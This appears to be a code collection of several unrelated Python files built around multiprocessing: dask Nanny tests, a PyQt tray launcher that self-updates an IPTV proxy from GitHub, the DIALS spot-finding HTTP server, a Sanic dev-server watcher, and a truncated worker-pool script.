@gen_cluster(
nthreads=[],
client=True,
config={"distributed.nanny.environ": {"A": 1, "B": 2, "D": 4}},
)
async def test_environment_variable_config(c, s, monkeypatch):
monkeypatch.setenv("D", "123")
async with Nanny(s.address, env={"B": 3, "C": 4}) as n:
results = await c.run(lambda: os.environ)
assert results[n.worker_address]["A"] == "1"
assert results[n.worker_address]["B"] == "3"
assert results[n.worker_address]["C"] == "4"
assert results[n.worker_address]["D"] == "123"
@gen_cluster(nthreads=[], client=True)
async def test_data_types(c, s):
w = await Nanny(s.address, data=dict)
r = await c.run(lambda dask_worker: type(dask_worker.data))
assert r[w.worker_address] == dict
await w.close()
@gen_cluster(nthreads=[])
async def test_local_directory(s):
with tmpfile() as fn:
with dask.config.set(temporary_directory=fn):
w = await Nanny(s.address)
assert w.local_directory.startswith(fn)
assert "dask-worker-space" in w.local_directory
assert w.process.worker_dir.count("dask-worker-space") == 1
await w.close()
def _noop(x):
"""Define here because closures aren't pickleable."""
pass
@gen_cluster(
nthreads=[("127.0.0.1", 1)],
client=True,
Worker=Nanny,
config={"distributed.worker.daemon": False},
)
async def test_mp_process_worker_no_daemon(c, s, a):
def multiprocessing_worker():
p = mp.Process(target=_noop, args=(None,))
p.start()
p.join()
await c.submit(multiprocessing_worker)
@gen_cluster(
nthreads=[("127.0.0.1", 1)],
client=True,
Worker=Nanny,
config={"distributed.worker.daemon": False},
)
async def test_mp_pool_worker_no_daemon(c, s, a):
def pool_worker(world_size):
with mp.Pool(processes=world_size) as p:
p.map(_noop, range(world_size))
await c.submit(pool_worker, 4)
@gen_cluster(nthreads=[])
async def test_nanny_closes_cleanly(s):
async with Nanny(s.address) as n:
assert n.process.pid
proc = n.process.process
assert not n.process
assert not proc.is_alive()
assert proc.exitcode == 0
@pytest.mark.slow
@gen_cluster(nthreads=[], timeout=60)
async def test_lifetime(s):
counter = 0
event = asyncio.Event()
class Plugin(SchedulerPlugin):
def add_worker(self, **kwargs):
pass
def remove_worker(self, **kwargs):
nonlocal counter
counter += 1
if counter == 2: # wait twice, then trigger closing event
event.set()
s.add_plugin(Plugin())
async with Nanny(s.address):
async with Nanny(s.address, lifetime="500 ms", lifetime_restart=True):
await event.wait()
@gen_cluster(client=True, nthreads=[])
async def test_nanny_closes_cleanly_2(c, s):
async with Nanny(s.address) as n:
with c.rpc(n.worker_address) as w:
IOLoop.current().add_callback(w.terminate)
start = time()
while n.status != Status.closed:
await asyncio.sleep(0.01)
assert time() < start + 5
assert n.status == Status.closed
@gen_cluster(client=True, nthreads=[])
async def test_config(c, s):
async with Nanny(s.address, config={"foo": "bar"}) as n:
config = await c.run(dask.config.get, "foo")
assert config[n.worker_address] == "bar"
@gen_cluster(client=True, nthreads=[])
async def test_nanny_port_range(c, s):
nanny_port = "9867:9868"
worker_port = "9869:9870"
async with Nanny(s.address, port=nanny_port, worker_port=worker_port) as n1:
assert n1.port == 9867 # Selects first port in range
async with Nanny(s.address, port=nanny_port, worker_port=worker_port) as n2:
assert n2.port == 9868 # Selects next port in range
with pytest.raises(
ValueError, match="Could not start Nanny"
): # No more ports left
async with Nanny(s.address, port=nanny_port, worker_port=worker_port):
pass
# Ensure Worker ports are in worker_port range
def get_worker_port(dask_worker):
return dask_worker.port
worker_ports = await c.run(get_worker_port)
assert list(worker_ports.values()) == parse_ports(worker_port)
class KeyboardInterruptWorker(worker.Worker):
"""A Worker that raises KeyboardInterrupt almost immediately"""
async def heartbeat(self):
def raise_err():
raise KeyboardInterrupt()
self.loop.add_callback(raise_err)
@pytest.mark.parametrize("protocol", ["tcp", "ucx"])
@pytest.mark.asyncio
async def test_nanny_closed_by_keyboard_interrupt(cleanup, protocol):
if protocol == "ucx": # Skip if UCX isn't available
pytest.importorskip("ucp")
async with Scheduler(protocol=protocol, dashboard_address=":0") as s:
async with Nanny(
s.address, nthreads=1, worker_class=KeyboardInterruptWorker
) as n:
n.auto_restart = False
await n.process.stopped.wait()
# Check that the scheduler has been notified about the closed worker
assert len(s.workers) == 0
class StartException(Exception):
pass
class BrokenWorker(worker.Worker):
async def start(self):
raise StartException("broken")
@gen_cluster(nthreads=[])
async def test_worker_start_exception(s):
# make sure this raises the right Exception:
with pytest.raises(StartException):
async with Nanny(s.address, worker_class=BrokenWorker) as n:
pass
@gen_cluster(nthreads=[])
async def test_failure_during_worker_initialization(s):
with captured_logger(logger="distributed.nanny", level=logging.WARNING) as logs:
with pytest.raises(Exception):
async with Nanny(s.address, foo="bar") as n:
await n
assert "Restarting worker" not in logs.getvalue()
@gen_cluster(client=True, Worker=Nanny)
async def test_environ_plugin(c, s, a, b):
from dask.distributed import Environ
await c.register_worker_plugin(Environ({"ABC": 123}))
async with Nanny(s.address, name="new") as n:
results = await c.run(os.getenv, "ABC")
assert results[a.worker_address] == "123"
assert results[b.worker_address] == "123"
assert results[n.worker_address] == "123"
@pytest.mark.parametrize(
"modname",
[
# numpy is always imported, and for a good reason:
# https://github.com/dask/distributed/issues/5729
"scipy",
pytest.param("pandas", marks=pytest.mark.xfail(reason="distributed#5723")),
],
)
@gen_cluster(client=True, Worker=Nanny, nthreads=[("", 1)])
async def test_no_unnecessary_imports_on_worker(c, s, a, modname):
"""
Regression test against accidentally importing unnecessary modules at worker startup.
Importing modules like pandas slows down worker startup, especially if workers are
loading their software environment from NFS or other non-local filesystems.
It also slightly increases memory footprint.
"""
def assert_no_import(dask_worker):
assert modname not in sys.modules
await c.wait_for_workers(1)
await c.run(assert_no_import)
|
sstvLauncher.py
|
import sys, signal, os, urllib, subprocess, json, logging, ntpath, platform, requests, shutil, threading, multiprocessing
from PyQt4 import QtGui, QtCore
from logging.handlers import RotatingFileHandler
# Setup logging
log_formatter = logging.Formatter(
'%(asctime)s - %(levelname)-10s - %(name)-10s - %(funcName)-25s- %(message)s')
logger = logging.getLogger('SmoothStreamsLauncher')
logger.setLevel(logging.DEBUG)
logging.getLogger('werkzeug').setLevel(logging.ERROR)
# Console logging
console_handler = logging.StreamHandler()
console_handler.setLevel(logging.DEBUG)
console_handler.setFormatter(log_formatter)
logger.addHandler(console_handler)
# Rotating Log Files
if not os.path.isdir(os.path.join(os.path.dirname(sys.argv[0]), 'cache')):
os.mkdir(os.path.join(os.path.dirname(sys.argv[0]), 'cache'))
file_handler = RotatingFileHandler(os.path.join(os.path.dirname(sys.argv[0]), 'cache', 'status.log'),
maxBytes=1024 * 1024 * 2,
backupCount=5)
file_handler.setLevel(logging.DEBUG)
file_handler.setFormatter(log_formatter)
logger.addHandler(file_handler)
class SystemTrayIcon(QtGui.QSystemTrayIcon):
def __init__(self, icon, parent=None):
self.initVariables()
QtGui.QSystemTrayIcon.__init__(self,icon,parent)
self.menu = QtGui.QMenu(parent)
self.createMenu()
self.setContextMenu(self.menu)
self.set_icon()
if self.start:
logger.info("Launching YAP!")
self.tray_start()
else:
logger.info("not launching")
def createMenu(self,update=False):
if update: self.menu.clear()
if self.start:
openAction = self.menu.addAction('Open YAP')
QtCore.QObject.connect(openAction, QtCore.SIGNAL('triggered()'), self.tray_open)
terminalAction = self.menu.addAction('Show Terminal')
QtCore.QObject.connect(terminalAction, QtCore.SIGNAL('triggered()'), self.showTerminal)
else:
startAction = self.menu.addAction('Start YAP')
QtCore.QObject.connect(startAction, QtCore.SIGNAL('triggered()'), self.tray_restart)
self.menu.addSeparator()
checkAction = self.menu.addAction('Check for Updates')
QtCore.QObject.connect(checkAction, QtCore.SIGNAL('triggered()'), self.tray_check_update)
updateAction = self.menu.addAction('Update')
QtCore.QObject.connect(updateAction, QtCore.SIGNAL('triggered()'), self.tray_update)
if self.start:
restartAction = self.menu.addAction('Restart YAP')
QtCore.QObject.connect(restartAction, QtCore.SIGNAL('triggered()'), self.tray_restart)
branchAction = self.menu.addAction('Switch Master/Dev')
QtCore.QObject.connect(branchAction, QtCore.SIGNAL('triggered()'), self.tray_branch)
logAction = self.menu.addAction('Open Logs')
QtCore.QObject.connect(logAction, QtCore.SIGNAL('triggered()'), self.tray_logs)
cacheAction = self.menu.addAction('Clear Cache')
QtCore.QObject.connect(cacheAction, QtCore.SIGNAL('triggered()'), self.tray_cache)
exitAction = self.menu.addAction('Exit')
QtCore.QObject.connect(exitAction, QtCore.SIGNAL('triggered()'), self.on_exit)
def initVariables(self):
self.type = ""
self.version = float("0.0")
self.latestVersion = float("0.0")
# Branch Master = True
self.branch = True
self.yap = None
self.LISTEN_IP = '127.0.0.1'
self.LISTEN_PORT = 6969
self.SERVER_HOST = "http://" + self.LISTEN_IP + ":" + str(self.LISTEN_PORT)
self.start = False
self.validIcon = QtGui.QIcon("logo_tray.ico")
self.updateIcon = QtGui.QIcon("logo_tray-update.ico")
try:
logger.debug("Parsing settings")
with open(os.path.join(os.path.dirname(sys.argv[0]), 'launcher.json')) as jsonConfig:
config = {}
config = json.load(jsonConfig)
if "version" in config:
self.version = config["version"]
if "type" in config:
self.type = config["type"]
if "branch" in config:
self.branch = config["branch"] == True
self.assign_latestFile()
self.check_install()
self.start = True
except:
urllib.request.urlretrieve('https://raw.githubusercontent.com/vorghahn/sstvProxy/master/logo_tray.ico',
os.path.join(os.path.dirname(sys.argv[0]), 'logo_tray.ico'))
urllib.request.urlretrieve(
'https://raw.githubusercontent.com/vorghahn/sstvProxy/master/logo_tray-update.ico',
os.path.join(os.path.dirname(sys.argv[0]), 'logo_tray-update.ico'))
self.detect_install()
self.assign_latestFile()
self.version = float(self.version)
logger.debug("Settings complete")
return
def closeEvent(self, event):
if self.okayToClose():
#user asked for exit
self.trayIcon.hide()
event.accept()
else:
#"minimize"
self.hide()
self.trayIcon.show() #thanks @mojo
event.ignore()
def __icon_activated(self, reason):
if reason in (QtGui.QSystemTrayIcon.Trigger, QtGui.QSystemTrayIcon.DoubleClick):
logger.info("double clicked")
self.show()
def on_exit(self):
if self.yap: self.yap.terminate()
self.exit()
def exit(self):
QtCore.QCoreApplication.exit()
def showTerminal(self):
import time
import select
if platform.system() == 'Linux':
#subprocess.Popen(args, stdout=subprocess.PIPE)
subprocess.Popen(["tail", "-F", "nohup.out"], stdout=subprocess.PIPE)
#f = subprocess.Popen(['tail','-F','nohup.out')],stdout=subprocess.PIPE,stderr=subprocess.PIPE)
#p = select.poll()
#p.register(f.stdout)
#while True:
#if p.poll(1):
#print (f.stdout.readline())
#time.sleep(1)
elif platform.system() == 'Windows':
            pass  # terminal tailing not implemented on Windows
elif platform.system() == 'Darwin':
            pass  # terminal tailing not implemented on macOS
def gather_yap(self):
        if not os.path.isfile(os.path.join(os.path.dirname(sys.argv[0]), 'proxysettings.json')):
            logger.debug("No config file found.")
            return
try:
logger.debug("Parsing settings")
with open(os.path.join(os.path.dirname(sys.argv[0]), 'proxysettings.json')) as jsonConfig:
config = {}
config = json.load(jsonConfig)
if "ip" in config and "port" in config:
self.LISTEN_IP = config["ip"]
self.LISTEN_PORT = config["port"]
self.SERVER_HOST = "http://" + self.LISTEN_IP + ":" + str(self.LISTEN_PORT)
logger.debug("Using config file.")
except:
pass
def tray_update(self):
if self.version < self.latestVersion:
# todo make update link
self.shutdown(update=True, restart=True)
self.set_icon()
else:
icon = os.path.join(os.path.dirname(sys.argv[0]), 'logo_tray.ico')
hover_text = 'YAP' + ' - No Update Available'
self.set_icon()
def set_icon(self):
logger.info("set icon")
if self.version < self.latestVersion:
icon = os.path.abspath('logo_tray-update.ico')
hover_text = 'YAP' + ' - Update Available!'
self.setIcon(self.updateIcon)
else:
icon = os.path.abspath('logo_tray.ico')
hover_text = 'YAP'
self.setIcon(self.validIcon)
logger.info("icon 2")
return
def detect_install(self):
logger.info("Detect install")
if os.path.isfile(os.path.join(os.path.dirname(sys.argv[0]), 'sstvProxy.py')):
logger.info("Detect python")
self.type = ""
return
elif platform.system() == 'Linux':
self.type = "Linux/"
if os.path.isfile(os.path.join(os.path.dirname(sys.argv[0]), 'sstvProxy')):
logger.info("Detect linux exe")
return
elif platform.system() == 'Windows':
self.type = "Windows/"
if os.path.isfile(os.path.join(os.path.dirname(sys.argv[0]), 'sstvproxy.exe')):
logger.info("Detect win exe")
return
elif platform.system() == 'Darwin':
self.type = "Macintosh/"
if os.path.isfile(os.path.join(os.path.dirname(sys.argv[0]), 'sstvproxy')):
logger.info("Detect mac exe")
return
logger.info('installing')
self.assign_latestFile()
self.shutdown(update=True, install=True)
def check_install(self):
logger.debug("Check install")
if self.type == "" and os.path.isfile(os.path.join(os.path.dirname(sys.argv[0]), 'sstvProxy.py')):
return
elif self.type == "Linux/" and platform.system() == 'Linux' and os.path.isfile(os.path.join(os.path.dirname(sys.argv[0]), 'sstvProxy')):
return
elif self.type == "Windows/" and platform.system() == 'Windows'and os.path.isfile(os.path.join(os.path.dirname(sys.argv[0]), 'sstvproxy.exe')):
return
elif self.type == "Macintosh/" and platform.system() == 'Darwin' and os.path.isfile(os.path.join(os.path.dirname(sys.argv[0]), 'sstvproxy')):
return
logger.info('Installing YAP %s' % self.type)
self.assign_latestFile()
self.shutdown(update=True)
def assign_latestFile(self):
if self.type == "": self.latestfile = "https://raw.githubusercontent.com/vorghahn/sstvProxy/{branch}/sstvProxy.py"
elif self.type == "Linux/": self.latestfile = "https://raw.githubusercontent.com/vorghahn/sstvProxy/{branch}/Linux/sstvProxy"
elif self.type == "Windows/": self.latestfile = "https://raw.githubusercontent.com/vorghahn/sstvProxy/{branch}/Windows/sstvproxy.exe"
elif self.type == "Macintosh/": self.latestfile = "https://raw.githubusercontent.com/vorghahn/sstvProxy/{branch}/Macintosh/sstvproxy"
self.url = "https://raw.githubusercontent.com/vorghahn/sstvProxy/master/%sversion.txt" % self.type
try:
self.latestVersion = float(requests.get(self.url).json()['Version'])
except:
self.latestVersion = float(0.0)
logger.info("Latest version check failed, check internet.")
logger.info(self.url)
def tray_open(self):
self.launch_browser()
def tray_check_update(self):
try:
latest_ver = float(json.loads(urllib.request.urlopen(self.url).read().decode('utf-8'))['Version'])
except:
latest_ver = float(0.0)
logger.info("Latest version check failed, check internet.")
if self.version < latest_ver:
logger.info("Update Available. You are on v%s with v%s available." % (self.version, latest_ver))
else:
logger.info("Proxy is up to date!")
def save_data(self):
logger.info("Saving data")
config = {'version':self.version,'type':self.type,'branch':self.branch}
with open(os.path.join(os.path.dirname(sys.argv[0]), 'launcher.json'), 'w') as fp:
json.dump(config, fp)
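    # Example launcher.json as written by save_data() above (values are
    # illustrative, not taken from a real install):
    #   {"version": 1.75, "type": "Windows/", "branch": true}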
def tray_start(self):
if self.type == "":
import sstvProxy
self.yap = multiprocessing.Process(target=sstvProxy.main)
self.yap.start()
elif self.type == "Linux/": subprocess.Popen(os.path.abspath("sstvProxy"), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
#elif self.type == "Linux/": os.spawnl(sys.executable, os.path.abspath("sstvProxy"))
elif self.type == "Windows/": subprocess.Popen([".\sstvproxy.exe", "-d"], cwd=os.getcwd())
elif self.type == "Macintosh/": subprocess.Popen(os.path.abspath("sstvproxy"), stdout=subprocess.PIPE,stderr=subprocess.PIPE) #os.execv(sys.executable, ["./sstvproxy", "-d"])
self.start = True
self.createMenu(True)
def tray_restart(self):
self.shutdown(restart=True)
def tray_quit(self):
self.shutdown()
def tray_cache(self):
shutil.rmtree(os.path.join(os.path.dirname(sys.argv[0]), 'cache'), ignore_errors=True)
def tray_logs(self):
try:
import webbrowser
webbrowser.open(os.path.join(os.path.dirname(sys.argv[0]), 'cache', 'status.log'))
except Exception as e:
logger.error(u"Could not open logs: %s" % e)
def tray_branch(self):
self.branch = not self.branch
self.shutdown(update=True, restart=True)
def launch_browser(self):
try:
import webbrowser
self.gather_yap()
webbrowser.open('%s%s' % (self.SERVER_HOST,'/sstv/index.html'))
except Exception as e:
logger.error(u"Could not launch browser: %s" % e)
def shutdown(self, restart=False, update=False, install=False):
logger.info(u"Stopping YAP web server...")
if self.type == 'Windows/':
os.system("taskkill /F /im sstvProxy.exe")
elif self.type == 'Linux/':
import psutil
PROCNAME = "sstvProxy"
for proc in psutil.process_iter():
# check whether the process name matches
if proc.name() == PROCNAME:
proc.kill()
elif self.type == 'Macintosh/':
import psutil
PROCNAME = "sstvproxy"
for proc in psutil.process_iter():
# check whether the process name matches
if proc.name() == PROCNAME:
proc.kill()
elif self.yap:
self.yap.terminate()
self.yap = None
if update:
logger.info(u"YAP is updating...")
url = self.latestfile.format(branch='master' if self.branch else 'dev')
try:
newfilename = ntpath.basename(url)
logger.debug("downloading %s to %s" % (url,os.path.join(os.path.dirname(sys.argv[0]), newfilename)))
urllib.request.urlretrieve(url, os.path.join(os.path.dirname(sys.argv[0]), newfilename))
except Exception as e:
os.system("taskkill /F /im sstvProxy.exe")
urllib.request.urlretrieve(url, os.path.join(os.path.dirname(sys.argv[0]), newfilename))
logger.info("Update forced")
logger.debug("Gathering version")
self.version = float(json.loads(urllib.request.urlopen(self.url).read().decode('utf-8'))['Version'])
self.save_data()
if install and platform.system() == 'Linux':
os.chmod(os.path.join(os.path.dirname(sys.argv[0]), ntpath.basename(url)), 0o777)
if restart:
os.system('cls' if os.name == 'nt' else 'clear')
logger.info(u"YAP is restarting...")
self.tray_start()
def main():
app = QtGui.QApplication(sys.argv)
w = QtGui.QWidget()
trayIcon = SystemTrayIcon(QtGui.QIcon('logo_tray.ico'), w)
signal.signal(signal.SIGINT, signal.SIG_DFL)
trayIcon.show()
sys.exit(app.exec_())
if __name__ == '__main__':
main()
|
find_spots_server.py
|
import http.server as server_base
import json
import logging
import multiprocessing
import sys
import time
import urllib.parse
import libtbx.phil
from cctbx import uctbx
from dxtbx.model.experiment_list import ExperimentListFactory
from libtbx.introspection import number_of_processors
from dials.algorithms.indexing import indexer
from dials.algorithms.integration.integrator import create_integrator
from dials.algorithms.profile_model.factory import ProfileModelFactory
from dials.algorithms.spot_finding import per_image_analysis
from dials.array_family import flex
from dials.command_line.find_spots import phil_scope as find_spots_phil_scope
from dials.command_line.index import phil_scope as index_phil_scope
from dials.command_line.integrate import phil_scope as integrate_phil_scope
from dials.util import Sorry, show_mail_handle_errors
from dials.util.options import OptionParser
logger = logging.getLogger("dials.command_line.find_spots_server")
help_message = """\
A client/server version of dials.find_spots with additional analysis including
estimation of resolution limits. Intended for quick feedback of image quality
during grid scans and data collections.
On the server machine::
dials.find_spots_server [nproc=8] [port=1234]
On the client machine::
dials.find_spots_client [host=hostname] [port=1234] [nproc=8] /path/to/image.cbf
The client will return a short xml string indicating the number of spots found
and several estimates of the resolution limit.
e.g.::
<response>
<image>/path/to/image_0001.cbf</image>
<spot_count>352</spot_count>
<spot_count_no_ice>263</spot_count_no_ice>
<d_min>1.46</d_min>
<d_min_method_1>1.92</d_min_method_1>
<d_min_method_2>1.68</d_min_method_2>
<total_intensity>56215</total_intensity>
</response>
* ``spot_count`` is the total number of spots found in the given image
* ``spot_count_no_ice`` is the number of spots found excluding those at resolutions
where ice rings may be found
* ``d_min_method_1`` is equivalent to distl's resolution estimate method 1
* ``d_min_method_2`` is equivalent to distl's resolution estimate method 2
* ``total_intensity`` is the total intensity of all strong spots excluding those
at resolutions where ice rings may be found
Any valid ``dials.find_spots`` parameter may be passed to
``dials.find_spots_client``, e.g.::
dials.find_spots_client /path/to/image.cbf min_spot_size=2 d_min=2
To stop the server::
dials.find_spots_client stop [host=hostname] [port=1234]
"""
stop = False
def _filter_by_resolution(experiments, reflections, d_min=None, d_max=None):
reflections.centroid_px_to_mm(experiments)
reflections.map_centroids_to_reciprocal_space(experiments)
d_star_sq = flex.pow2(reflections["rlp"].norms())
reflections["d"] = uctbx.d_star_sq_as_d(d_star_sq)
# Filter based on resolution
if d_min is not None:
selection = reflections["d"] >= d_min
reflections = reflections.select(selection)
logger.debug(f"Selected {len(reflections)} reflections with d >= {d_min:f}")
# Filter based on resolution
if d_max is not None:
selection = reflections["d"] <= d_max
reflections = reflections.select(selection)
logger.debug(f"Selected {len(reflections)} reflections with d <= {d_max:f}")
return reflections
def work(filename, cl=None):
if cl is None:
cl = []
phil_scope = libtbx.phil.parse(
"""\
ice_rings {
filter = True
.type = bool
width = 0.004
.type = float(value_min=0.0)
}
index = False
.type = bool
integrate = False
.type = bool
indexing_min_spots = 10
.type = int(value_min=1)
"""
)
interp = phil_scope.command_line_argument_interpreter()
params, unhandled = interp.process_and_fetch(
cl, custom_processor="collect_remaining"
)
filter_ice = params.extract().ice_rings.filter
ice_rings_width = params.extract().ice_rings.width
index = params.extract().index
integrate = params.extract().integrate
indexing_min_spots = params.extract().indexing_min_spots
interp = find_spots_phil_scope.command_line_argument_interpreter()
phil_scope, unhandled = interp.process_and_fetch(
unhandled, custom_processor="collect_remaining"
)
logger.info("The following spotfinding parameters have been modified:")
logger.info(find_spots_phil_scope.fetch_diff(source=phil_scope).as_str())
params = phil_scope.extract()
# no need to write the hot mask in the server/client
params.spotfinder.write_hot_mask = False
experiments = ExperimentListFactory.from_filenames([filename])
if params.spotfinder.scan_range and len(experiments) > 1:
        # This means we've imported a sequence of still images: select
# only the experiment, i.e. image, we're interested in
((start, end),) = params.spotfinder.scan_range
experiments = experiments[start - 1 : end]
# Avoid overhead of calculating per-pixel resolution masks in spotfinding
# and instead perform post-filtering of spot centroids by resolution
d_min = params.spotfinder.filter.d_min
d_max = params.spotfinder.filter.d_max
params.spotfinder.filter.d_min = None
params.spotfinder.filter.d_max = None
t0 = time.perf_counter()
reflections = flex.reflection_table.from_observations(experiments, params)
if d_min or d_max:
reflections = _filter_by_resolution(
experiments, reflections, d_min=d_min, d_max=d_max
)
t1 = time.perf_counter()
logger.info("Spotfinding took %.2f seconds", t1 - t0)
imageset = experiments.imagesets()[0]
reflections.centroid_px_to_mm(experiments)
reflections.map_centroids_to_reciprocal_space(experiments)
stats = per_image_analysis.stats_for_reflection_table(
reflections, filter_ice=filter_ice, ice_rings_width=ice_rings_width
)._asdict()
t2 = time.perf_counter()
logger.info("Resolution analysis took %.2f seconds", t2 - t1)
if index and stats["n_spots_no_ice"] > indexing_min_spots:
logging.basicConfig(stream=sys.stdout, level=logging.INFO)
interp = index_phil_scope.command_line_argument_interpreter()
phil_scope, unhandled = interp.process_and_fetch(
unhandled, custom_processor="collect_remaining"
)
logger.info("The following indexing parameters have been modified:")
index_phil_scope.fetch_diff(source=phil_scope).show()
params = phil_scope.extract()
if (
imageset.get_goniometer() is not None
and imageset.get_sequence() is not None
and imageset.get_sequence().is_still()
):
imageset.set_goniometer(None)
imageset.set_sequence(None)
try:
idxr = indexer.Indexer.from_parameters(
reflections, experiments, params=params
)
indexing_results = []
idxr.index()
indexed_sel = idxr.refined_reflections.get_flags(
idxr.refined_reflections.flags.indexed
)
indexed_sel &= ~(
idxr.refined_reflections.get_flags(
idxr.refined_reflections.flags.centroid_outlier
)
)
for i_expt, expt in enumerate(idxr.refined_experiments):
sel = idxr.refined_reflections["id"] == i_expt
sel &= indexed_sel
indexing_results.append(
{
"crystal": expt.crystal.to_dict(),
"n_indexed": sel.count(True),
"fraction_indexed": sel.count(True) / sel.size(),
}
)
stats["lattices"] = indexing_results
stats["n_indexed"] = indexed_sel.count(True)
stats["fraction_indexed"] = indexed_sel.count(True) / len(reflections)
except Exception as e:
logger.error(e)
stats["error"] = str(e)
finally:
t3 = time.perf_counter()
logger.info("Indexing took %.2f seconds", t3 - t2)
if integrate and "lattices" in stats:
interp = integrate_phil_scope.command_line_argument_interpreter()
phil_scope, unhandled = interp.process_and_fetch(
unhandled, custom_processor="collect_remaining"
)
logger.error("The following integration parameters have been modified:")
integrate_phil_scope.fetch_diff(source=phil_scope).show()
params = phil_scope.extract()
try:
params.profile.gaussian_rs.min_spots = 0
experiments = idxr.refined_experiments
reference = idxr.refined_reflections
predicted = flex.reflection_table.from_predictions_multi(
experiments,
dmin=params.prediction.d_min,
dmax=params.prediction.d_max,
margin=params.prediction.margin,
force_static=params.prediction.force_static,
)
matched, reference, unmatched = predicted.match_with_reference(
reference
)
assert len(matched) == len(predicted)
assert matched.count(True) <= len(reference)
if matched.count(True) == 0:
raise Sorry(
"""
Invalid input for reference reflections.
Zero reference spots were matched to predictions
"""
)
elif matched.count(True) != len(reference):
logger.info("")
logger.info("*" * 80)
logger.info(
"Warning: %d reference spots were not matched to predictions",
len(reference) - matched.count(True),
)
logger.info("*" * 80)
logger.info("")
# Compute the profile model
experiments = ProfileModelFactory.create(params, experiments, reference)
# Compute the bounding box
predicted.compute_bbox(experiments)
# Create the integrator
integrator = create_integrator(params, experiments, predicted)
# Integrate the reflections
reflections = integrator.integrate()
# print len(reflections)
stats["integrated_intensity"] = flex.sum(
reflections["intensity.sum.value"]
)
except Exception as e:
logger.error(e)
stats["error"] = str(e)
finally:
t4 = time.perf_counter()
logger.info("Integration took %.2f seconds", t4 - t3)
return stats
class handler(server_base.BaseHTTPRequestHandler):
def do_GET(self):
"""Respond to a GET request."""
if self.path == "/Ctrl-C":
self.send_response(200)
self.end_headers()
global stop
stop = True
return
filename = self.path.split(";")[0]
params = self.path.split(";")[1:]
# If we're passing a url through, then unquote and ignore leading /
if "%3A//" in filename:
filename = urllib.parse.unquote(filename[1:])
d = {"image": filename}
try:
stats = work(filename, params)
d.update(stats)
response = 200
except Exception as e:
d["error"] = str(e)
response = 500
self.send_response(response)
self.send_header("Content-type", "application/json")
self.end_headers()
response = json.dumps(d).encode()
self.wfile.write(response)
def serve(httpd):
try:
while not stop:
httpd.handle_request()
except KeyboardInterrupt:
pass
phil_scope = libtbx.phil.parse(
"""\
nproc = Auto
.type = int(value_min=1)
port = 1701
.type = int(value_min=1)
"""
)
def main(nproc, port):
server_class = server_base.HTTPServer
httpd = server_class(("", port), handler)
print(time.asctime(), "Serving %d processes on port %d" % (nproc, port))
for j in range(nproc - 1):
proc = multiprocessing.Process(target=serve, args=(httpd,))
proc.daemon = True
proc.start()
serve(httpd)
httpd.server_close()
print(time.asctime(), "done")
@show_mail_handle_errors()
def run(args=None):
usage = "dials.find_spots_server [options]"
# Python 3.8 on macOS... needs fork
if sys.hexversion >= 0x3080000 and sys.platform == "darwin":
multiprocessing.set_start_method("fork")
parser = OptionParser(usage=usage, phil=phil_scope, epilog=help_message)
params, options = parser.parse_args(args, show_diff_phil=True)
if params.nproc is libtbx.Auto:
params.nproc = number_of_processors(return_value_if_unknown=-1)
main(params.nproc, params.port)
if __name__ == "__main__":
run()
|
watch.py
|
import asyncio
import os
import signal
import sys
from multiprocessing import Process
from aiohttp import ClientSession
from watchgod import awatch
from .exceptions import SanicDevException
from .log import rs_dft_logger as logger
from .config import Config
from .serve import serve_main_app
class WatchTask:
def __init__(self, path: str, loop: asyncio.AbstractEventLoop):
self._loop = loop
self._app = None
self._task = None
assert path
self.stopper = asyncio.Event(loop=self._loop)
self._awatch = awatch(path, stop_event=self.stopper)
async def start(self, app):
self._app = app
self._task = self._loop.create_task(self._run())
async def _run(self):
raise NotImplementedError()
async def close(self, *args):
if self._task:
self.stopper.set()
async with self._awatch.lock:
if self._task.done():
self._task.result()
self._task.cancel()
class AppTask(WatchTask):
template_files = '.html', '.jinja', '.jinja2'
def __init__(self, config: Config, loop: asyncio.AbstractEventLoop):
self._config = config
self._reloads = 0
self._session = None
self._runner = None
super().__init__(self._config.watch_path, loop)
async def _run(self, live_checks=20):
self._session = ClientSession()
try:
self._start_dev_server()
async for changes in self._awatch:
self._reloads += 1
if any(f.endswith('.py') for _, f in changes):
logger.debug('%d changes, restarting server', len(changes))
self._stop_dev_server()
self._start_dev_server()
except Exception as exc:
logger.exception(exc)
await self._session.close()
raise SanicDevException('error running dev server')
def _start_dev_server(self):
act = 'Start' if self._reloads == 0 else 'Restart'
logger.info('%sing dev server at http://%s:%s ●', act, self._config.host, self._config.main_port)
try:
tty_path = os.ttyname(sys.stdin.fileno())
except OSError: # pragma: no branch
# fileno() always fails with pytest
tty_path = '/dev/tty'
except AttributeError:
            # os.ttyname() is unavailable on Windows, so fall back to no tty path
tty_path = None
self._process = Process(target=serve_main_app, args=(self._config, tty_path))
self._process.start()
def _stop_dev_server(self):
if self._process.is_alive():
logger.debug('stopping server process...')
os.kill(self._process.pid, signal.SIGINT)
self._process.join(5)
if self._process.exitcode is None:
logger.warning('process has not terminated, sending SIGKILL')
os.kill(self._process.pid, signal.SIGKILL)
self._process.join(1)
else:
logger.debug('process stopped')
else:
logger.warning('server process already dead, exit code: %s', self._process.exitcode)
async def close(self, *args):
self.stopper.set()
self._stop_dev_server()
await asyncio.gather(super().close(), self._session.close())
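# A rough lifecycle sketch for AppTask (illustrative assumptions only: `config`
# is a Config whose watch_path/host/main_port are populated, and `app` is
# whatever object serve_main_app expects to run).
async def _app_task_sketch(config: Config, app):
    task = AppTask(config, asyncio.get_event_loop())
    await task.start(app)     # start the dev-server process and the awatch loop
    await asyncio.sleep(60)   # develop; any .py change triggers a restart
    await task.close()        # stop watching and shut the server process down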
|
manual_pool.py
|
#!/usr/bin/env python3
from sys import argv
from multiprocessing import Process, Manager
import time
import itertools
import re
def do_work(in_queue, out_list):
def any_word(patterns, data):
return [p.search(data) for p in patterns]
    while True:
        item = in_queue.get()
        line_no, line, patterns = item
        print(line_no, line, patterns)
        # exit signal: the producer enqueues one None line per worker
        if line is None:
            return
        ans = any_word(patterns, line)
        print(ans)
        # skip non-matching lines instead of exiting the worker
        if not any(ans):
            continue
        result = (line_no, line)
        out_list.append(result)
if __name__ == "__main__":
NUM_WORKERS = 4
filename = argv[1]
words = argv[2:]
    print(filename, words)
patterns = [re.compile(x) for x in words]
manager = Manager()
results = manager.list()
work = manager.Queue(NUM_WORKERS)
# start workers
    print('start workers')
pool = []
    for i in range(NUM_WORKERS):
p = Process(target=do_work, args=(work, results))
p.start()
pool.append(p)
# produce data
    print('produce data')
with open(filename) as f:
iters = itertools.chain(f, (None,)*NUM_WORKERS)
for lineno, line in enumerate(iters):
